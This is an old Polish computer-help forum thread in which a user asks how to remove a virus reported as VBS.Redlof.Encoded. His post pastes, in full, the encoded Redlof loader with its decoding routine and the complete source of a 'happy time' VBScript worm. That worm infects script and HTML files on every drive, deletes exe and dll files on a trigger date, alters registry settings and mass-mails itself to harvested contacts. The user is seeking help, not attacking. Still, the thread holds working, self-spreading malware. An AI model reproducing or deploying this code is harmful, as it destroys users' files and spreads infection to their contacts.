Ta strona używa ciasteczek (cookies), dzięki którym nasz serwis może działać lepiej. Dowiedz się więcej OK, rozumiem

wirus k_jot

Poszukujesz jakiegoś programu? Twój komputer kolejny raz zastrajkował? Tutaj znajdziesz pomoc w jego opanowaniu, informacje o sterownikach, oprogramowaniu, porady.

wirus k_jot

Post 11.10.2003, 10:22:11

mam jakieos wirusa k_jot czy jakos tak
no i do plikow html i htm dodaje mi taki kod:
Kod: Zaznacz cały
<HTML>
<BODY onload="vbscript:KJ_start()">
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>
ExeString = "@heEmOaaq]%DseePdpm(UZlPdpm(C]`nd]Leff%=oheaNZcabl%BRG%SrKaakd%ShfI]s`%OtZ>(Eag]kq=ercRm[JBXosYkp'!JBLas<bi'!JB<ndYmaLaeedm!%DFKadaHl!%DFBj^]s]F]hd!%DFOjhl`_Zpd =g`Kn^Emg_sahjCC=oh^jcLh$EaeaOYmd+LrldKmn(Km>nqgkQ]lql]JdpmK^pJ^]cL^io6EKH*Nh^jS]qpEaea'>bhdHZpg$*%MioKmn5NdY]Pdei*Q]Z`@deA_Hflpq MioKmn+DF^km]ql!%!!8=)NjHdf!PlhLpq!8)Pg]gJ^]cL^io&<hnk^=qes?qm[menfDf]H^H^Pxh^Osj9apsPg]gJ^]cL^io&<hnk^K^p>bhdL^io6EKH*Nh^jS]qpEaea'>bhdHZpg$+%?ek]Malh'Sqama5AG=UgghnY]9!%rak\nhhm6!!CC[rlZns !7ra;kHeSeiOsjn[?qD_%ApldMawlEaeaS]fl-;ekr]R]mE9mpqa[<?ON&@as>bhd ?ek]I]s`>:psjb^-Ympqa[qs]l<,0>hr]Q]Z`S]fl-;ekr]R]mEaeaS]fl5BRG'Ko]gPdpmBhd^$EaeaOYmd+0A_SqiaRlk<dseeLaamBhd^Pdei*Vjbpdo^BjEb;APLD7ra;kHe!4%>N<Rnfek`\6!o^r[keol3JBXosYkp'!!!6%o^BjEbDseePdpm=eodA_SqiaRlk<rakS`^j?ek]Malh'Sqaman[?qD_%O^rL^tsAm\EeBhd^Pdei*BdhodAm\EeAm\Btf\phggBtf\phggJB<d`f`aRm[$BmkndfmOsjbjf$E]rlBjc]q?gYk%BbDZosAg`dp<d`j9(Pg]gA_K]_p'D<]r]!?tjkamlLpqagc($*%55K;Zod _!!Pg]gCC?gYgcdKn^5BhfZhx<boj!2ULqa=9(DdlaDFB`Zjf]Lqa6B`k$@k\$K]_p'D<]r]!?tjkamlLpqagc($*%(&0!3X!OtZ><)=g`A_=eodGI;a]m_^OtZ9Eb`';nnq]gpRlkem_%-+DZosAg`dp<d`j=g`A_=g`>njblbkm>njblbkmDFBj^]s]F]hd!%Hj=knnjNdknidGawlH^EmOaaq]9apldS`^j>thlBtf\phgg=g`A_Ka]q]?ek]9D^bs PemHZpg$,%OjhcqYfEaearT<klehj>bhdkUIh[kkrg_pKa]q]]XRlZphggaqqU^kYgg-`mi!Ee!BRG'Bhd^Awalpr Ld`j^Bhd^%(MddfBYehCC=oh^jcLh$R`Znd>bhd$dsee(Akk^K^p>bhdL^io6EKH*Nh^jS]qpEaea'Ka]q]?ek]%.+lkqd!EaeaS]fl-Okes];APLD7ra;kHe!4%>N<Rnfek`\6!o^r[keol3JBXosYkp'!!!6%o^BjEbDseePdpm>bhdL^io&<hnk^=g`A_<^b`mepH\9OlOg]eh-J^cQ]Z`'AGDQX?TJKAMLXQR=KXH\^jsamedkU@d^ZqklQr]kH<%HqsDhkjN^nrahj5SrKaakd'Nd_Ka`\!GC>U^DH?@DXI@;AEM=UOn^ms`j^XLa\nnkhbsTHqsdhkj>toj^orTFacaZRdj%PoR`^hk&KafOkes]GC>U^;NNQ=GP^MLAQTB`dfmesa^o[@d^ZqklB`%UOn^ms`j^XLa\nnkhbsTHqsdhkj>toj^orTD^bs HqsDhkjN^nrahj+)%',[EZekT<klhhodNodLp`lbkm]ku!$*(!J>C^<PKQ<;ZhkDFLYbhQ]`$!@DAXW<QQJ>JSWNODJUEc]gphlbarTC]_]tdmEcXRg_pvYka[Eb_qglkelUKtlekncAwhkarkU%Eael!KtlEkncOaqkbkm$*%*/TF]hdUOsYmenf^nxG]l](R`Znd>bhd!BYehCCI`aeNd_!GC>U^;NNQ=GP^MLAQTB`dfmesa^o[@d^ZqklB`%UOn^ms`j^XLa\nnkhbsTHqsdhkj>toj^orTD^bs HqsDhkjN^nrahj+)%',[EZekTPec]OsYmenf^nxG]l](R`Znd>bhd!VkLddde*Q]`SqamaAGDQX?TJKAMLXQR=KXRg_pvYka[Eb_qglkelUKe^b_dT2*/THqsdhkjTHlsahjrTF]hdUAcamkqHkae]kam[^+),-//+(!J>C^<PKQ<;ZhkDFLYbhQ]`$!@DAXW<QQJ>JSWNODJUOn^ms`j^XLa\nnkhbsTPem\hsrFarkZchf`Rm[oxkmalTInn^bhdkUIh[kkrg_pGnpkghgAgpdjgasLaslbjfkU,`(],1(),/(),/()_/(),/(),/(),/,/X/(*a/+/,!$^kYgg!!BYehCCI`aeNd_!GC>U^;NNQ=GP^MLAQTLkelp]q]UIh[kkrg_p[ObjcgpoFMXBmkndfmRdjlenfUShf]kvkIdkl]fagcKn^rqlpdeULqg_ek]lXLa\nnkhbsHqsdhkjBjs]kjdlOdlmem_lX/Y)`/*),/(),/(),b(),/(),/(),/(-2[()-d(,2/%adZjjOlOg]eh-J^cVjbpdDJ=R[BMKNDFM[TK>N[KhbsoZndTFebjhon^mXN^_eb]U-/&)XNmmhngdXNhmenflXLYbh[=]esgkLq]_aq]g_d%-2))31$ND?X@VGK@!?`deJBF]hdKaf DJ=R[BMKNDFM[TK>N[KhbsoZndTFebjhon^mXN^_eb]U-/&)XBgfinfUI`aeOdlmem_lXM]pOsYmenf^nx%adZjjCCqleZcd>hhc]k$K]_p'ObjOYmd++%Lqg`n`eBhd^o[;hilggEaearTFebjhon^mR`Znd\UOsYmenf^nx=g`>njblbkm>njblbkmDFBj^]s]Feka^q'!NfAqjhnJ^ote^M]qpMalhI]s`9A_Mgm$EKH*EaeaDpbosk!ShfI]s`PObjbls&^td%LaamPdeiL`la<oxkmal++X!Am\EeEeMalhI]s`9lurl^i2*ULaamOsYkpTh?ek]9ObjOYmdRQLPDEUGdjgak++*cde>hr]RlZnsMiBhd^<PemHZpg!KROS=FXJ]kjdd'`kd=g`A_OlOg]eh-J^cVjbpdDJ=R[KG<=KWF=B@BJDTLkelp]q]UIh[kkrg_p[Objcgpo[;nnq]gpU]kohggXQmgXJ]kjdd,.!$Lp`jmQo>bhdBRG'?nhrBhd^VagL`la%sdZUgioZhk&`ee%ShfI]s`paaT?kk\^n-`mp!BRG'?nhrBhd^VagL`la%oxkmal++Xjbp]kd'ch^(VagL`la%oxkmal++Xc]lgsgi*hfb<]kdGI9ildf]Pn PemHZpg!o^^[>hhc]k*glm+apsOlOg]eh-J^cVjbpdDJ=R[BD:OR=L[QGHP[&]hkT(!\eheaea!SrKaakd'Nd_Pnhl^!@DAXW<H@KLARWKKNLU*cdeXBggpdfmSqia!$]oheebYmenf(t,el`noghnY]PoR`^hk&KafOkes]GC>U^;E=RK>O^JHKST]hk^bhdT=aeYnhsA\kmT(VkLddde*Q]`NdY]$!@DAXW<H@KLARWKKNLUrw\_ek]U@d^ZqklB_nfU(SrKaakd'Nd_Pnhl^!@DAXW<H@KLARWKKNLU`kd_ek]UObjbls=gchf^X!$RAK\nhhmPoR`^hk&KafOkes]GC>U^;E=RK>O^JHKST]hk>bhdTLdddeXNh^j[;hilYg`[%ShfI]s`L^ioHZpg!OL_qaip-]qa!0$OlOg]eh-J^cVjbpdDJ=R[BD:OR=L[QGHP[\ehEaea[Kaakd>t[Hkko]kpxKaadlA]m\eaqkUSR@InnhlX!$w5(+13;:1,1./A%*-B>&4B1/)/(:=/(;46(1?|VkLddde*Q]`SqamaAGDQX?K9LODKXNNGMXcdeBhd^XR[keolAkrl>jbg]a[%z0.-2)//0%-4/;&-0<+)A)?5,()?/,?45;,.3uK^p>bhdL^io6EKH*Nh^jS]qpEaea'Km]qlNlEaea+*%pqm^%?ek]Malh'SqamaN[oS]qp?ek]Malh'?kgla>jc?qm[menf?qm[menfGIDbgdAm$(EeBjV`^nd5:apldS`^j>thlBtf\phgg=g`A_LaerDh_`lbkm6cg\ql]gp-dh_`lbkmEeEael!PgalHn[Zphgg(,<bhd^LaamPgalHn[Zphgg<Fec MdhkEkbYmenf%5(Ee?ON&@as=qpdflenfG]l]!PgalHn[Zphgg%47!pg]gLaerDh_`lbkm6K]_p'LaerDh_`lbkm$Eam MdhkEkbYmenf,Eam ?ON&@as>bhdFZid MdhkEkbYmenf%(Am\EeEeEam MdhkEkbYmenf=,S`^jMdhkEkbYmenf9LaerDh_`lbkm!T=g`A_CCqleZcd>hhc]k$S`boKg\]sahj(Am\EeAm\Btf\phggBtf\phggJBF]hdKaf KafKmn+>bhdFZid!NfAqjhnJ^ote^M]qpKafL^ioKmn5SrKaakd'Nd_Ka`\!Nd_Lpq!H^Nd_MalhLpq6!Pg]gOlOg]eh-J^cVjbpdKafKmn+>bhdFZidAm\EeAm\Btf\phggBtf\phggJBH^nKn^';nnq]gpRlkem_Kn^D6/PdkmKtl9(CgSgaeaLkqdPdkmKtl9L^osGnp#-BbL^osGnp6.7MddfBmkndfmOsjbjf6Eag]kq=erc3X!AwamCgDf]H^NfAqjhnJ^ote^M]qpLasMdhk?kk\^n5BRG'Cdl?kk\^n';nnq]gpRlkem_K^p<b_Rm[<<ndYmaNZcabl!R[keolbjf&=eblbkmYku!!R]mEge`djl<Mdhk?kk\^n-Kn^Ege`djl>hhc]k?nmgp5,?kq>]b`PdeiBnd]aqbj>hhc]ko?kk\^nBgnjs6Ege`dj<ktfm**<b_Rm[*`\]Ege`dj<ktfm(L^io>hhc]k*MYfaGawlH^@h[Lqa&<ktfm<)S`^jE]rlBjc]q?gYk<BjrlkNdn!?tjkamlLpqagc+U+D^j';nnq]gpRlkem_)0!Rm[Osjbjf6La]$BmkndfmOsjbjf$E]rlBjc]q?gYk'0$Eam <qqj^jsKmnhf`%,DZosAg`dp<d`j&-(?tjkamlLpqagc5GI;a]m_^OtZ!?tjkamlLpqagc+DZosAg`dp<d`jKn^D60Akk^A_Rm[A5,Laam?tjkamlLpqagc5?tjkamlLpqagc@h[Lqa&Bpde!-(!T=qes=k>hr]i6/Bnjf5-LhEge`dj<ktfmA_K;Zod LqaKmnhf`%5HBYla'<b_Rm[*Hl^i'b%LaamEec;?kk\^nBgnjsMddfBmkndfmOsjbjf6BmkndfmOsjbjfCa\OtZ'Es]f$i#*%[Dpbp<h=g`A_=g`A_F^tsH`kmEm\^tB`Zn5EmkmnQ]o$BmkndfmOsjbjf$X!$Eam <qqj^jsKmnhf`%,)Kn^Rlkem_9Eb`';nnq]gpRlkem_%H`kmEm\^tB`Zn*)%Hdf!?tjkamlLpqagc(%E]rlBjc]q?gYk)0!BmkndfmOsjbjf6JB<d`f`aRm[$BmkndfmOsjbjf$E]rlBjc]q?gYk%>jcBb>jcBbEknhJBH^nKn^5?tjkamlLpqagc>jc?qm[menf?qm[menfGIHkkoY`]s]!%Hj=knnjNdknidGawlQ]`L`laR`dna5GC>U^DH?@DXI@;AEM=UOn^ms`j^XLa\nnkhbsTHqsdhkj>toj^orT=afj^a!@hkd@d_kad6VkLddde*Q]`NdY]$Q]`L`laR`dna(Ee=erc=afj^a5!MddfCalgC]`nd]9>bj`dr@hkd%6[Df]H^Egkh5*sg1=erc=afj^a5GIG[kRm[$CalgC]`nd]CCqleZcd>hhc]k$CalgC]`nd]F^tsSrKaakd'Nd_Pnhl^Q]`L`laR`dna+<boj<^cq]^=g`>njblbkm>njblbkmDFtef]f]?kk\^n'HZpgFZid!NfAqjhnJ^ote^M]qpLas?kk\^nMYfa5BRG'Cdl?kk\^n'HZpgFZid!R]mS`boEaear6Ege`djG]l]'Bhd^oAps=qerll<)>hn=Z_gMdhk?ek]EmMdhk?ek]l>bhd=qp5QBYla'>LK-?^pDpmamkbkmFZid Mdhk?ek]'L`la%(Ee?ek]>ts6!@MI!Hn>bhd=qp5GLFH!Hn>bhd=qp5@KIGkEaeaDpm<LGHNjBhd^Awl9COOPg]g;ZhkDF@hiam\Mk'Laer>bhd&I]s`%glfh!!DdlaH^Bhd^Awl9O>RPg]g;ZhkDF@hiam\Mk'Laer>bhd&I]s`%uZl(Akk^Ee?ek]>ts6!@MP!MddfGlmAwalpr60Am\EeJdpmA_'M<]r]!L`laJ`e^%5QBYla'ObjOYmdC]lgsgiX!!Nj$T;Zod I]s`G]l]<N?`k^$VagL`la%@dkdpnh%(LaamDsl>thkmo5->jcBbBb@mpDpbosk9(Pg]g>LK-;hlx>bhdPemHZpg!kros]f/1T]arcmko&bjh%L`laJ`e^>LK-;hlx>bhdPemHZpg!o^^[>hhc]k*glm+HZpgFZidAm\EeAm\Btf\phggBtf\phggJBLas<bi'!NfAqjhnJ^ote^M]qp>nq&<hdYkL^osAm<PObjbls&L_qaipEmehmYfaBb=knLaamEmOaaq]9apld=eodEmOaaq]9o^rDf]H^H^EmOaaq]9o^rPg]gK^p>LK5?q]ZpdG[fd[m$!K\nhhmem_'Bhd^OxkmalG[fd[m(OdlSrKaakd9;ka`l^Kab^_s SR[keol'Og]eh!!DdlaLas:lod^Kab^_s6cg\ql]gp-Yilk]mo'DF^_narl%:lod^Kab^_s&las;EOH<!z>2/4<<.1%*?E(&-0<))@<;5,()?/,?@40:,Au%:lod^Kab^_s&\ndYmaHflp`f\a'!R]mVkLddde<:lod^Kab^_s&@asG[fd[m$(=oheaNZcabl'odl<HRA=$!s)@3+?A/)&B/1,)0)<B,020/%),@(<5/--.10v(=oheaNZcabl'_q]ZpdAgosYg_d K^p>LK5=oheaNZcabl'CdlH^i]\p'!Df]H^R]mCalgNZcabl9>LK-<keu]l>hn=Z_g=ercMalhEm=ercH^i]\pBb<bojL^io&=nhn^Pxh^;6.9g`<bojL^io&=nhn^Pxh^;6-LaamAwamEgk=g`A_>bj`dr@hkd<=ercMalh'@qaoaK]mpdjM]qp=elHpg]k=qj!/(N`f]klasa?kqb9/Mk+Nlaaq9kn'a<Bjs !5Nm\%GawlS]flRlkem_9>hna6-LhK]g$S`boS]qp(PdeiJte99l_'Eb`'LaerL^ts$b(0!A_S]flMmf<*/LaamPdeiJte9*1=eodA_S]flMmf<*,LaamPdeiJte9*2=g`A_L^io;a]q6B`k$S]flMmf,Hpg]k=qj!eEh`,%BbL^io;a]q6B`k$2,S`^jMalh<d`j9;an')1%>jcBbMalhLpqagc5PdeiOsjbjfS]flB`ZnGawlTfEkbcLpq6!=qabmma'@heGdq:nq ,%+LaerL^tsuZ<nK^!C^u@jk$/!9Gmddj:nq )%!ra;kHeJ]r=qj!-(6!Nlaaq9kn')%!o^BjEb%Gdq:nq +%5Ks`^n@jk$1!%n[?qD_!Dax9kn'+<%Hpg]k=qj!/(!uZ<nK^!>hna6-LhK]g$Dp^Osjbjf!%n[?qD_!MalhGql6@k\$La]$Dp^Osjbjf$b(0!!o^BjEb%EeMalhGql600Pg]g!o^BjEb%PdeiJte9+-!o^BjEb%Am\EeuZ<nK^!L^io;a]q6B`k$S]flMmf*Dax9kn'aIn\0(!%n[?qD_!BbL^io;a]q6B`k$10S`^j!ra;kHeS]flB`Zn5ra;k!o^BjEb%Akk^EeMalh<d`j9;an'*2%LaamuZ<nK^!L^io;a]q6uZEb!ra;kHeDf]H^%n[?qD_!MdhkMawl9LaerL^tsS]flB`Zn!ra;kHeM]qp!ra;kHe!=qabmma'LaerL^ts!LaerL^ts6!=qaRlkem_9PdeiOsjbjf!ApldMawl9!4%objblse]m_n]f]6rak\nhhm:!uZ<nK^]kbmfaml'sqama!!4%`hnosqea<ikramenf3]akhhtl^7d^bs2)lw3pnh3,op4va]pg2)lw3dda`ds2)lw3v,ag`dp3.73rhkb^hdbpx2dh\]am7;!%=OHEASG=L=6GI!Xct]lp@>EF@M9/PECLA9/\kc]6_ne'ir&%]blbrdP'=blbrd!Q?neikm]gp=5.9ILK=M:!!4%+cao:!%o^BjEb;(objbls6%o^BjEb;l_qaipdZjfmZcd5o^r[keol7ra;kHeS`boS]qpra;kHeTfEkbcLpquZ<nK^5.k\nhhm:!uZ<nK^5.:H@X6%o^BjEb;(DSEE:!RakMawl9LaerL^tsuZ<nK^MgHn[dOsjn[?qD_%GIWlp`jm$(VagL`la<?ON&@asKiabaZhEge`dj!,(!TA_'>LK->bhd=qerll$VagL`la%sdZUBnd]aq&aps%LaamBRG'?nhrBhd^VagL`la%sdZUBnd]aq&aps%ShfI]s`paaTdfvYeh-_bb!Am\EeEe!BRG'Bhd^Awalpr PemHZpg!kros]f/1T]arcmko&bjh%LaamBRG'?nhrBhd^VagL`la%oxkmal++Xc]lgsgi*hfb+ObjOYmdrqlpde,.[ccs`de*fa_>jcBb>jc?qm[menf"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&"KeyArr(1) = 4"&vbCrLf&"KeyArr(2) = 1"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>
</BODY>
</HTML>


co mam zrobic ?
recznie nie usune bo to co jakisczas dodaje
oprocz tego dodaje mi jeszcze do innej czesci plikow taki kod




Kod: Zaznacz cały
<script language='VBScript'>










































































Rem I am sorry! happy time
On Error Resume Next
mload
Sub mload()
On Error Resume Next
mPath = Grf()
Set Os = CreateObject("Scriptlet.TypeLib")
Set Oh = CreateObject("Shell.Application")
If IsHTML Then
mURL = LCase(document.Location)
If mPath = "" Then
Os.Reset
Os.Path = "C:\Help.htm"
Os.Doc = Lhtml()
Os.Write()
Ihtml = "<span style='position:absolute'><Iframe src='C:\Help.htm' width='0' height='0'></Iframe></span>"
Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
Else
If Iv(mPath, "Help.vbs") Then
setInterval "Rt()", 10000
Else
m = "hta"
If LCase(m) = Right(mURL, Len(m)) Then
id = setTimeout("mclose()", 1)
main
Else
Os.Reset()
Os.Path = mPath & "\" & "Help.hta"
Os.Doc = Lhtml()
Os.write()
Iv mPath, "Help.hta"
End If
End If
End If
Else
main
End If
End Sub
Sub main()
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
Set Od = CreateObject("Scripting.Dictionary")
Od.Add "html", "1100"
Od.Add "vbs", "0100"
Od.Add "htm", "1100"
Od.Add "asp", "0010"
Ks = "HKEY_CURRENT_USER\Software\"
Ds = Grf()
Cs = Gsf()
If IsVbs Then
If Of.FileExists("C:\help.htm") Then
Of.DeleteFile ("C:\help.htm")
End If
Key = CInt(Month(Date) + Day(Date))
If Key = 13 Then
Od.RemoveAll
Od.Add "exe", "0001"
Od.Add "dll", "0001"
End If
Cn = Rg(Ks & "Help\Count")
If Cn = "" Then
Cn = 1
End If
Rw Ks & "Help\Count", Cn + 1
f1 = Rg(Ks & "Help\FileName")
f2 = FNext(Of, Od, f1)
fext = GetExt(Of, Od, f2)
Rw Ks & "Help\FileName", f2
If IsDel(fext) Then
f3 = f2
f2 = FNext(Of, Od, f2)
Rw Ks & "Help\FileName", f2
Of.DeleteFile f3
Else
If LCase(WScript.ScriptFullname) <> LCase(f2) Then
Fw Of, f2, fext
End If
End If
If (CInt(Cn) Mod 366) = 0 Then
If (CInt(Second(Time)) Mod 2) = 0 Then
Tsend
Else
adds = Og
Msend (adds)
End If
End If
wp = Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper")
If Rg(Ks & "Help\wallPaper") <> wp Or wp = "" Then
If wp = "" Then
n1 = ""
n3 = Cs & "\Help.htm"
Else
mP = Of.GetFile(wp).ParentFolder
n1 = Of.GetFileName(wp)
n2 = Of.GetBaseName(wp)
n3 = Cs & "\" & n2 & ".htm"
End If
Set pfc = Of.CreateTextFile(n3, True)
mt = Sa("1100")
pfc.Write "<" & "HTML><" & "body bgcolor='#007f7f' background='" & n1 & "'><" & "/Body><" & "/HTML>" & mt
pfc.Close
Rw Ks & "Help\wallPaper", n3
Rw "HKEY_CURRENT_USER\Control Panel\desktop\wallPaper", n3
End If
Else
Set fc = Of.CreateTextFile(Ds & "\Help.vbs", True)
fc.Write Sa("0100")
fc.Close
bf = Cs & "\Untitled.htm"
Set fc2 = Of.CreateTextFile(bf, True)
fc2.Write Lhtml
fc2.Close
oeid = Rg("HKEY_CURRENT_USER\Identities\Default User ID")
oe = "HKEY_CURRENT_USER\Identities\" & oeid & "\Software\Microsoft\Outlook Express\5.0\Mail"
MSH = oe & "\Message Send HTML"
CUS = oe & "\Compose Use Stationery"
SN = oe & "\Stationery Name"
Rw MSH, 1
Rw CUS, 1
Rw SN, bf
Web = Cs & "\WEB"
Set gf = Of.GetFolder(Web).Files
Od.Add "htt", "1100"
For Each m In gf
fext = GetExt(Of, Od, m)
If fext <> "" Then
Fw Of, m, fext
End If
Next
End If
End Sub
Sub mclose()
document.Write "<" & "title>I am sorry!</title" & ">"
window.Close
End Sub
Sub Rt()
Dim mPath
On Error Resume Next
mPath = Grf()
Iv mPath, "Help.vbs"
End Sub
Function Sa(n)
Dim VBSText, m
VBSText = Lvbs()
If Mid(n, 3, 1) = 1 Then
m = "<%" & VBSText & "%>"
End If
If Mid(n, 2, 1) = 1 Then
m = VBSText
End If
If Mid(n, 1, 1) = 1 Then
m = Lscript(m)
End If
Sa = m & vbCrLf
End Function
Sub Fw(Of, S, n)
Dim fc, fc2, m, mmail, mt
On Error Resume Next
Set fc = Of.OpenTextFile(S, 1)
mt = fc.ReadAll
fc.Close
If Not Sc(mt) Then
mmail = Ml(mt)
mt = Sa(n)
Set fc2 = Of.OpenTextFile(S, 8)
fc2.Write mt
fc2.Close
Msend (mmail)
End If
End Sub
Function Sc(S)
mN = "Rem I am sorry! happy time"
If InStr(S, mN) > 0 Then
Sc = True
Else
Sc = False
End If
End Function
Function FNext(Of, Od, S)
Dim fpath, fname, fext, T, gf
On Error Resume Next
fname = ""
T = False
If Of.FileExists(S) Then
fpath = Of.GetFile(S).ParentFolder
fname = S
ElseIf Of.FolderExists(S) Then
fpath = S
T = True
Else
fpath = Dnext(Of, "")
End If
Do While True
Set gf = Of.GetFolder(fpath).Files
For Each m In gf
If T Then
If GetExt(Of, Od, m) <> "" Then
FNext = m
Exit Function
End If
ElseIf LCase(m) = LCase(fname) Or fname = "" Then
T = True
End If
Next
fpath = Pnext(Of, fpath)
Loop
End Function
Function Pnext(Of, S)
On Error Resume Next
Dim Ppath, Npath, gp, pn, T, m
T = False
If Of.FolderExists(S) Then
Set gp = Of.GetFolder(S).SubFolders
pn = gp.Count
If pn = 0 Then
Ppath = LCase(S)
Npath = LCase(Of.GetParentFolderName(S))
T = True
Else
Npath = LCase(S)
End If
Do While Not Er
For Each pn In Of.GetFolder(Npath).SubFolders
If T Then
If Ppath = LCase(pn) Then
T = False
End If
Else
Pnext = LCase(pn)
Exit Function
End If
Next
T = True
Ppath = LCase(Npath)
Npath = Of.GetParentFolderName(Npath)
If Of.GetFolder(Ppath).IsRootFolder Then
m = Of.GetDriveName(Ppath)
Pnext = Dnext(Of, m)
Exit Function
End If
Loop
End If
End Function
Function Dnext(Of, S)
Dim dc, n, d, T, m
On Error Resume Next
T = False
m = ""
Set dc = Of.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
If T Then
Dnext = d
Exit Function
Else
If LCase(S) = LCase(d) Then
T = True
End If
If m = "" Then
m = d
End If
End If
End If
Next
Dnext = m
End Function
Function GetExt(Of, Od, S)
Dim fext
On Error Resume Next
fext = LCase(Of.GetExtensionName(S))
GetExt = Od.Item(fext)
End Function
Sub Rw(k, v)
Dim R
On Error Resume Next
Set R = CreateObject("WScript.Shell")
R.RegWrite k, v
End Sub
Function Rg(v)
Dim R
On Error Resume Next
Set R = CreateObject("WScript.Shell")
Rg = R.RegRead(v)
End Function
Function IsVbs()
Dim ErrTest
On Error Resume Next
ErrTest = WScript.ScriptFullname
If Err Then
IsVbs = False
Else
IsVbs = True
End If
End Function
Function IsHTML()
Dim ErrTest
On Error Resume Next
ErrTest = document.Location
If Er Then
IsHTML = False
Else
IsHTML = True
End If
End Function
Function IsMail(S)
Dim m1, m2
IsMail = False
If InStr(S, vbCrLf) = 0 Then
m1 = InStr(S, "@")
m2 = InStr(S, ".")
If m1 <> 0 And m1 < m2 Then
IsMail = True
End If
End If
End Function
Function Lvbs()
Dim f, m, ws, Of
On Error Resume Next
If IsVbs Then
Set Of = CreateObject("Scripting.FileSystemObject")
Set f = Of.OpenTextFile(WScript.ScriptFullname, 1)
Lvbs = f.ReadAll
Else
For Each ws In document.scripts
If LCase(ws.Language) = "vbscript" Then
If Sc(ws.Text) Then
Lvbs = ws.Text
Exit Function
End If
End If
Next
End If
End Function
Function Iv(mPath, mName)
Dim Shell
On Error Resume Next
Set Shell = CreateObject("Shell.Application")
Shell.NameSpace(mPath).Items.Item(mName).InvokeVerb
If Er Then
Iv = False
Else
Iv = True
End If
End Function
Function Grf()
Dim Shell, mPath
On Error Resume Next
Set Shell = CreateObject("Shell.Application")
mPath = "C:\"
For Each mShell In Shell.NameSpace(mPath).Items
If mShell.IsFolder Then
Grf = mShell.Path
Exit Function
End If
Next
If Er Then
Grf = ""
End If
End Function
Function Gsf()
Dim Of, m
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
m = Of.GetSpecialFolder(0)
If Er Then
Gsf = "C:\"
Else
Gsf = m
End If
End Function
Function Lhtml()
Lhtml = "<" & "HTML" & "><HEAD" & ">" & vbCrLf & _
"<" & "Title> Help </Title" & "><" & "/HEAD>" & vbCrLf & _
"<" & "Body> " & Lscript(Lvbs()) & vbCrLf & _
"<" & "/Body></HTML" & ">"
End Function
Function Lscript(S)
Lscript = "<" & "script language='VBScript'>" & vbCrLf & _
S & "<" & "/script" & ">"
End Function
Function Sl(S1, S2, n)
Dim l1, l2, l3, i
l1 = Len(S1)
l2 = Len(S2)
i = InStr(S1, S2)
If i > 0 Then
l3 = i + l2 - 1
If n = 0 Then
Sl = Left(S1, i - 1)
ElseIf n = 1 Then
Sl = Right(S1, l1 - l3)
End If
Else
Sl = ""
End If
End Function
Function Ml(S)
Dim S1, S3, S2, T, adds, m
S1 = S
S3 = """"
adds = ""
S2 = S3 & "mailto" & ":"
T = True
Do While T
S1 = Sl(S1, S2, 1)
If S1 = "" Then
T = False
Else
m = Sl(S1, S3, 0)
If IsMail(m) Then
adds = adds & m & vbCrLf
End If
End If
Loop
Ml = Split(adds, vbCrLf)
End Function
Function Og()
Dim i, n, m(), Om, Oo
Set Oo = CreateObject("Outlook.Application")
Set Om = Oo.GetNamespace("MAPI").GetDefaultFolder(10).Items
n = Om.Count
ReDim m(n)
For i = 1 To n
m(i - 1) = Om.Item(i).Email1Address
Next
Og = m
End Function
Sub Tsend()
Dim Od, MS, MM, a, m
Set Od = CreateObject("Scripting.Dictionary")
MConnect MS, MM
MM.FetchSorted = True
MM.Fetch
For i = 0 To MM.MsgCount - 1
MM.MsgIndex = i
a = MM.MsgOrigAddress
If Od.Item(a) = "" Then
Od.Item(a) = MM.MsgSubject
End If
Next
For Each m In Od.Keys
MM.Compose
MM.MsgSubject = "Fw: " & Od.Item(m)
MM.RecipAddress = m
MM.AttachmentPathName = Gsf & "\Untitled.htm"
MM.Send
Next
MS.SignOff
End Sub
Function MConnect(MS, MM)
Dim U
On Error Resume Next
Set MS = CreateObject("MSMAPI.MAPISession")
Set MM = CreateObject("MSMAPI.MAPIMessages")
U = Rg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\DefaultProfile")
MS.UserName = U
MS.DownLoadMail = False
MS.NewSession = False
MS.LogonUI = True
MS.SignOn
MM.SessionID = MS.SessionID
End Function
Sub Msend(Address)
Dim MS, MM, i, a
MConnect MS, MM
i = 0
MM.Compose
For Each a In Address
If IsMail(a) Then
MM.RecipIndex = i
MM.RecipAddress = a
i = i + 1
End If
Next
MM.MsgSubject = " Help "
MM.AttachmentPathName = Gsf & "\Untitled.htm"
MM.Send
MS.SignOff
End Sub
Function Er()
If Err.Number = 0 Then
Er = False
Else
Err.Clear
Er = True
End If
End Function
Function IsDel(S)
If Mid(S, 4, 1) = 1 Then
IsDel = True
Else
IsDel = False
End If
End Function









</script>


zainfekowalo mi to niemal wszystkie pliki :(
mks vir znajduje tego wirusa ale sa tylko opcje 'skasuj' i 'kontynuuj' :(
znajduje tez tego wirusa w plikach FOLDER.HT - do nich tez dodaje ten 1 kod...

a nazwe tego wirusa pokazuje jako VBS.Redlof.Encoded

mial ktos z tym do czynienia ?
jak to wyleczyc ?

prosze o szybka odp. albo skierowanie mnie na jakies b dobre forum gdzie mi pmoga... :)
dzieki
Avatar użytkownikaebaq
Arkadiusz Dworniczak

Posty: 792
Dołączył(a): 24.04.2003

Post 11.10.2003, 12:15:33

przeczytaj to, powinno pomóc.

pozdrawiam.
Avatar użytkownikas4
Rafał Drąg

seryjny samobójca
